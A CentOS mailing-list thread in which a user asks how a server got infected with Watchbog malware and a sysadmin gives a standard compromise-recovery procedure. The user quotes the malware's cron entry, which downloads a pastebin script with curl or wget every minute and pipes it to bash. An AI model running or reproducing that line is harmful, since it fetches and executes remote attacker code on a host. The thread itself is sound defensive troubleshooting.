On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
<kaushalshriyan@xxxxxxxxx> wrote:
Hi,
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently i am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O-
https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
3)ps aux | grep watchbog
kill -9 pidof watchbog
Any suggestions or recommendations to find out how CentOS 7.5 Linux box got
infected with Watchbog Malware. Is there any open source software which can
do you have untampered log files?
be installed on CentOS 7.5 Linux box to detect and prevent Malware?
Standard compromise recovery procedure since forever is (your local
policy my have slightly different order about notifications and similar):
1. back up all user data
2. Wipe hard drive or whatever storage system you have (some malware
potentially can flush itself instead of BIOS, but I haven't seen any of
really existing actually do that - experts probably will chime in here)
3. Freshly re-install system, update, configure with all security
precautions in mind, restore users and user data
4. Fresh sshd installation takes care of generation of new server key
pair, just don't copy and re-use old pair
5. Revoke old SSL certificate(s), and recreate and sign new one(s) -
with new secret key
6. Notify superiors and all users about compromise; stress that users
have to change their password and key pair(s) on this machine, and
should consider compromised their accounts on machines they connected to
from this machine after compromise happened. As thorough forensics often
takes longer that two weeks, so you can not tell right away exact date
of original compromise (not the obvious one you see on the surface now),
suggest they change passwords (and key pairs) on machines they ever
connected from compromised one. And make them aware that they should
apply it as a chain (about account on machines further in the chain of
connections).
To prevent re-occurrence of the above: update, update, update. Never
install anything that is not coming from the source you trust, anything
that is not downloaded by yourself from trusted source. Paranoia is in
sysadmin's job description. Install host based intrusion detection
system. Do your own research and chose what is suitable your situation.
I hope this helps.
Valeri
Thanks in Advance.
Best Regards,
Kaushal
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos
--
++++++++++++++++++++++++++++++++++++++++
Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247
++++++++++++++++++++++++++++++++++++++++
_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
https://lists.centos.org/mailman/listinfo/centos
